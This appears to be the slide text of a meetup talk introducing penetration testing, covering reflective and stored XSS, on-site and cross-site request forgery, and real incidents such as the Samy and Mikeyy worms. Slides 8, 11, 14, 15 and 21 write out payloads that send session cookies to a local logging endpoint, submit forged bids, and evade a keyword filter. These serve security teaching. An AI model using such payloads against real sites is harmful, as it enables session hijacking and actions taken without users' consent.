This was a full length talk presented by Amit Dhakkad in vodQA-3: A QA Meet held in ThoughtWorks, Pune.

Published in: Technology

  • 1. Amit Dhakad
    Application Developer
    Is considered a “survivor”
    Likes To Read About Black Magic & Illusions
  • 2. What, why and how's of Penetration Testing
    - Amit Dhakad
  • 3. What do I plan to cover?
    What is Penetration Testing?
    Cross-site scripting (XSS)
      What is it?
      Types of XSS: Reflective XSS, Stored XSS
    Request Forgery
      What is it?
      Types of Request Forgery: On-site request forgery, Cross-site request forgery
    Attack mechanisms
    Real world examples
    Why do we need to pay attention?
  • 4. Penetration Testing
    Simulating a malicious attack on a system
  • 5. Cross-site scripting (XSS)
    Injecting JavaScript through user-controllable fields
  • 6. Reflective XSS
    Injecting JavaScript using URL parameters
  • 7. Diagram courtesy: The Web Application Hacker's Handbook
  • 8. Attack: http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
  • 9. Stored XSS
    Exploiting the server's ability to persist user input
  • 10. Diagram courtesy: The Web Application Hacker's Handbook
  • 11. Attack: image URL is set to "onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
  • 12. Request Forgery
    Perform unwitting actions on behalf of the user
  • 13. On-site Request Forgery (OSRF)
    From same domain
  • 14. Attack with XSS: image URL is set to " onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
  • 15. Attack without XSS: image URL is set to /bids?bid[amount]=500&bid[auction_id]=1
  • 16. Cross-site Request Forgery (CSRF)
    From a different domain
  • 17. Same origin policy
    A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.
    A page residing on one domain can load a script from another domain and execute this within its own context.
  • 18. What can you do with XSS and Request Forgery?
    Session hijacking
    Performing arbitrary actions
    Disclosure of user data
  • 19. Real world attacks
  • 20. MySpace worm by Samy (XSS + OSRF)
    Bypassed all filters and added a script to his profile
    The script did two things:
    Added the visiting user as a friend
    The script got copied into the user’s profile
    Anyone visiting the new infected user also got added as Samy’s friend.
  • 21. Protection: MySpace strips out the word "onreadystatechange", which is necessary for XML-HTTP requests
    Attack: eval('xmlhttp.onread' + 'ystatechange = callback');
  • eBay – discovered by Dave Armstrong (OSRF)
    Crafted URL set as image URL
    An arbitrary bid was placed on behalf of the visiting user
  • 25. Mikeyy Twitter worm (XSS + OSRF)
    Implemented by a 17-year-old boy
    -- "<script src=""></script>"
    Visiting users got infected
    Infected users began tweeting unwittingly.
  • 26. Gmail vulnerability – discovered by Petko Petkov (CSRF)
    Adds a filter that forwards all emails to the attacker's email address
  • 27. Why do we need to pay attention?
    The shift is towards attacking clients
    Technologies don't provide strong protection
    These are considered "lame" attacks
    Identification using automated tools is difficult
    Penetration testing is considered a separate vertical
  • 28. Break your own walls before anyone else does it
  • 29. Q & A
  • 30. Thank you